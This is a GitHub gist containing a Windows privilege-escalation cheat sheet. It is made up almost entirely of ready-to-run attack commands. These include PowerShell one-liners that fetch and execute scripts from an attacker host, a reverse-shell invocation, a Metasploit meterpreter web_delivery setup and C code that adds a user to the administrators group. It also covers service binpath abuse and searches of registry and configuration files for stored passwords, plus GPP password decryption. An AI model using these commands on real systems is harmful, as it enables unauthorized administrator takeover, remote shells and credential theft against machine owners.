Last active
August 11, 2018 14:45
-
-
Save alexandercastillo1/a3cfe4990f628c074bbb1b283cc4303b to your computer and use it in GitHub Desktop.
PrivilegeEscalationThatWorks-Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **PowerUp/AlwaysInstallElevated** | |
| Scanning | |
| reg query HKCU\SOFTWARE\Policies\microsoft\Windows\Installer /v AlwaysInstallElevated | |
| reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | |
| Attack | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip:8000/PowerUp.ps1'); Get-RegistryAlwaysInstallElevated" | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip:8000/PowerUp.ps1'); Write-UserAddMSI" | |
| (Under user profile the software is installed) | |
| **DLL Hijack - IKEEXT DLL** | |
| powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://hackerip:port/Ikeext-Privesc.ps1'); Invoke-IkeextCheck -Verbose" | |
| **MS-14-058** | |
| Scanning | |
| powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://attacker-ip:8000/Sherlock.ps1') ; Find-AllVulns" | |
| Attack | |
| /etc/init.d/apache2 start | |
| /etc/init.d/postgresql start | |
| msfconsole | |
| use exploit/multi/script/web_delivery | |
| set payload windows/meterpreter/reverse_tcp | |
| set LHOST attacker_IP | |
| set LPORT listener_port | |
| run | |
| **MS-16-032-NO-GRAPHICAL** | |
| Scanning | |
| powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://attacker-ip:8000/Sherlock.ps1') ; Find-AllVulns" | |
| Attack | |
| IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip:port/ms16_032_intrd_mod.ps1');Invoke-MS16-032"-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.Webclient).DownloadString('http://attacker-ip:port/PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress Attacker-ip -Port listeningport" | |
| **Search for clear-text passwords** | |
| findstr /si password *.txt | |
| findstr /si password *.xml | |
| findstr /si password *.ini | |
| dir /s *pass* == *cred* == *vnc* == *.config* | |
| findstr /spin "password" *.* | |
| findstr /spin "password" *.* | |
| type c:\sysprep.inf | |
| type c:\sysprep\sysprep.xml | |
| type c:\unattend.xml | |
| type %WINDIR%\Panther\Unattend\Unattended.xml | |
| type %WINDIR%\Panther\Unattended.xml | |
| dir c:\*vnc.ini /s /b | |
| dir c:\*ultravnc.ini /s /b | |
| dir c:\ /s /b | findstr /si *vnc.ini | |
| reg query "HKCU\Software\ORL\WinVNC3\Password" | |
| reg query "HKLM\Software\Microsoft\Windows NT\Currentversion\Winlogon" | |
| reg query "HKLM\System\Current\ControlSet\Services\SNMP" | |
| reg query "HKCU\Software\SimonTatham\Putty\Sessions" | |
| reg query HKLM /f password /t REG_SZ /s | |
| reg query HKCU /f password /t REG_SZ /s | |
| **Unquoted Path** | |
| Scanning PowerShell | |
| cmd /c 'wmic service get name,displayname,pathname,startmode | findtr /i "auto" |find /i /v "c:\windows\\" | findstr /i /v """' | |
| Scanning cmd | |
| wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ | |
| Attack | |
| Finding location of service | |
| sc qc "service name" | |
| Checking Service Permissions | |
| accesschk.exe "path to service.exe" | |
| Code 1 | |
| #include <stdlib.h> /* system, NULL, EXIT_FAILURE */ | |
| int main () | |
| { | |
| int i; | |
| i=system ("net localgroup administrators "standardusername" /add") | |
| return 0; | |
| } | |
| Code 2 | |
| msfvenom -p windows/exec CMD='net localgroup administrators standardusername" /add" -f exe-service -o /root/Desktop/servicename.exe | |
| Compilation | |
| i686-w64-mingw32-gcc -v -o nameofservice.exe useradd.c | |
| Replace old .exe with the new one, AND REBOOT | |
| **Service BINPATH** | |
| Scanning | |
| accesschk.exe -uwcqv "Authenticated Users" * /accepteula | |
| accesschk.exe -qwcu "Users" * | |
| accesschk.exe -qwcu "Everyone" * | |
| Attack | |
| You must get a 'RW' with SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG | |
| sc config <service-name> binpath= "net user newusername P@ssword123! /add" | |
| sc config upnphost obj=".\LocalSystem" password="" | |
| sc stop <service-name> | |
| sc start <service-name> | |
| sc config <service-name> binpath= "net localgroup Administrators newjustaddedusername /add" | |
| sc stop <service-name> | |
| sc start <service-name> | |
| **Churrasco - Windows Server 2003** | |
| churrasco -d "net user administrator /active:yes" | |
| churrasco -d "net user administrator Password1" | |
| churrasco -d "net localgroup "remote desktop users" administrator /add" | |
| **Group Policy Preferences** | |
| net use z: \\dc01\sysvol | |
| z: | |
| dir /s groups.xml | |
| type groups.xml | |
| gpp-decrypt cpasswordcontent |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment